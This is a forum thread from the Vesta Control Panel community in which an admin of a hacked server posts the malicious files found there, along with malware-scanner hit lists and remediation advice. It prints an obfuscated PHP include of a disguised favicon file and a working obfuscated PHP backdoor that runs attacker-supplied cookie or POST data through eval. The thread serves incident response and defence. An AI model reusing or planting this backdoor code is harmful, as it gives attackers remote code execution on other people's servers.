Vesta Control Panel - Forum

1. This is in a index.php file:

<?php
/*3bd6f*/

@include "\x2fhom\x65/kw\x73/we\x62/ka\x7aira\x6egaw\x69ldl\x69fes\x6fcie\x74y.i\x6e/pu\x62lic\x5fhtm\x6c/mo\x64ule\x73/bl\x6fg/f\x61vic\x6fn_2\x64393\x34.ic\x6f";

/*3bd6f*/

================
2. another PHP file uploaded by hacker:

<?php
$mslckg = '*#_g6r\'2om8s5k7nlfud4H-3pxeiyctvab0';$zmkcjwn = Array();$zmkcjwn[] = $mslckg[7].$mslckg[17].$mslckg[4].$mslckg[33].$mslckg[29].$mslckg[19].$mslckg[23].$mslckg[7].$mslckg[22].$mslckg[29].$mslckg[20].$mslckg[12].$mslckg[10].$mslckg[22].$mslckg[20].$mslckg[29].$mslckg[33].$mslckg[4].$mslckg[22].$mslckg[32].$mslckg[10].$mslckg[34].$mslckg[34].$mslckg[22].$mslckg[33].$mslckg[19].$mslckg[34].$mslckg[20].$mslckg[29].$mslckg[20].$mslckg[19].$mslckg[12].$mslckg[19].$mslckg[14].$mslckg[4].$mslckg[34];$zmkcjwn[] = $mslckg[21].$mslckg[0];$zmkcjwn[] = $mslckg[1];$zmkcjwn[] = $mslckg[29].$mslckg[8].$mslckg[18].$mslckg[15].$mslckg[30];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[2].$mslckg[5].$mslckg[26].$mslckg[24].$mslckg[26].$mslckg[32].$mslckg[30];$zmkcjwn[] = $mslckg[26].$mslckg[25].$mslckg[24].$mslckg[16].$mslckg[8].$mslckg[19].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[18].$mslckg[33].$mslckg[11].$mslckg[30].$mslckg[5];$zmkcjwn[] = $mslckg[32].$mslckg[5].$mslckg[5].$mslckg[32].$mslckg[28].$mslckg[2].$mslckg[9].$mslckg[26].$mslckg[5].$mslckg[3].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[16].$mslckg[26].$mslckg[15];$zmkcjwn[] = $mslckg[24].$mslckg[32].$mslckg[29].$mslckg[13];foreach ($zmkcjwn[7]($_COOKIE, $_POST) as $cqkektp => $pkste){function qvfslq($zmkcjwn, $cqkektp, $rzuhf){return $zmkcjwn[6]($zmkcjwn[4]($cqkektp . $zmkcjwn[0], ($rzuhf / $zmkcjwn[8]($cqkektp)) + 1), 0, $rzuhf);}function vmgpz($zmkcjwn, $hzjjhan){return @$zmkcjwn[9]($zmkcjwn[1], $hzjjhan);}function kgusa($zmkcjwn, $hzjjhan){$ykasv = $zmkcjwn[3]($hzjjhan) % 3;if (!$ykasv) {eval($hzjjhan[1]($hzjjhan[2]));exit();}}$pkste = vmgpz($zmkcjwn, $pkste);kgusa($zmkcjwn, $zmkcjwn[5]($zmkcjwn[2], $pkste ^ qvfslq($zmkcjwn, $cqkektp, $zmkcjwn[8]($pkste))));}

===

3. this one lookied like tried to temper the etc/passwd file

# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
southasiavi:southasiavi:644:58506:0de8a2d08fc4d676878ab80bcf29efb4:1511262032:1524020672:1524020672:/home/**/web/***.com/public_html/modules/field/theme/favicon_90a817.ico

FILE HIT LIST:
{HEX}php.base64.v23au.186 : /home/southasiavi/web/southasiaviews.com/public_html/modules/field/theme/favicon_90a817.ico => /usr/local/maldetect/quarantine/favicon_90a817.ico.273699283


===

4. FILE HIT LIST:
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/php5 => /usr/local/maldetect/quarantine/php5.11317678
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/systemd => /usr/local/maldetect/quarantine/systemd.1709516610
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /dev/shm/x => /usr/local/maldetect/quarantine/x.2515229452

===

Well,
the information you gave is not complete... Was only one site hacked or you find multiple sites hacked?
It looks more like an insecure site being targetted for malware injections.

You can:
1. Restore your site from a backup and then secure it.
2. Use Clamscan or Maldet to check your site files.

Ensure you have openbasedir restriction in place for each site so that if one is compromised, the hacker cannot crawl thru the other areas of the server

thanks a lot.

I restored all users from backup.

and did further scan and fixed some more issues